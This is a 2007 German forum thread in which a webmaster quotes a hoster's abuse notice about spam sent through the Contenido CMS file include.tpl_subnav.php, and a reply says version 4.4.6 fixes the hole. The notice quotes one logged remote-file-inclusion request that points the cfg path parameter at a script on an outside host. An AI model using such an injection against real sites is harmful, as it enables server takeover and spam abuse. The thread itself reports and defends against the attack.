include.tpl_subnav.php für spam missbraucht?

Gesperrt
sucram
Beiträge: 7
Registriert: Mi 7. Mär 2007, 11:45
Kontaktdaten:

include.tpl_subnav.php für spam missbraucht?

Beitrag von sucram » Mi 25. Jul 2007, 08:42

Hallo!

Ich habe heute diese Mail von einem Hoster eines Kundenprojektes bekommen ...

Kann mir jemand das Problem bestätigen?
Sehr geehrte Damen und Herren,

Bitte an den zuständigen Webmaster/Webdesigner weiterleiten!

Wir wurden informiert, dass ein Script, dass sich auf Ihrem Webhost befindet, von unbefugten Dritten missbraucht wird, um Spam zu verbreiten.

Durch diesen Missbrauch wurde unsere Webhost-Plattform - die neben
Ihrer Webpräsenz auch Internetpräsenzen anderer Kunden anbietet - derart in Anspruch genommen, sodass die Performance und Stabilität der Plattform darunter gelitten haben.

Die betroffene Datei:
/www/home/contenido/includes/include.tpl_subnav.php?cfg

Begründung:
Diese Datei wird benutzt, um über Drittadressen Spam zu versenden, als eines von vielen Beispielen:

POST
//contenido/includes/include.tpl_subnav.php?cfg[path][contenido]=http://h1.ripway.com/hacker2007/inbox.txt?HTTP/1.0"

Weitere Einträge können Sie aus den Logdateien, die Sie im Verzeichnis /www/log/ befindet, entnehmen.

Wir mussten daher dieses Script deaktivieren.

Bitte achten Sie bei der Verwendung von Scripts immer darauf, ob es möglicherweise eine neuere Variante davon gibt - man muss immer davon ausgehen:

a.) dass das eingesetzte Script möglicherweise Sicherheitslücken aufweisen könnte, und
b.) dass es immer potentielle Angreifer, die eine Sicherheitslücke ausnutzen wollen, gibt.

Wir sind im Sinne der Sicherheit natürlich bemüht, alle notwendigen Massnahmen einzuleiten, jedoch liegt die Absicherung eines selbstinstallierten Scripts ausschliesslich in der Zuständigkeit des Kunden bzw. des zuständigken Webdesigners.

...
lg
Marcus

MichFress
Beiträge: 750
Registriert: Mo 5. Jan 2004, 22:32
Wohnort: Bochum
Kontaktdaten:

Beitrag von MichFress » Mi 25. Jul 2007, 11:15

Dazu gibt es schon ein paar Threads hier im Forum.
Die Lücke müsste in der aktuellsten Version der 4.4-Serie (4.4.6) behoben sein.
"Es wird keine Handlung geben, keine Geschichte mit ihrer Versprechung auf einen Anfang und ihrer Hoffnung auf ein Ende." (Andrzej Stasiuk)

Gesperrt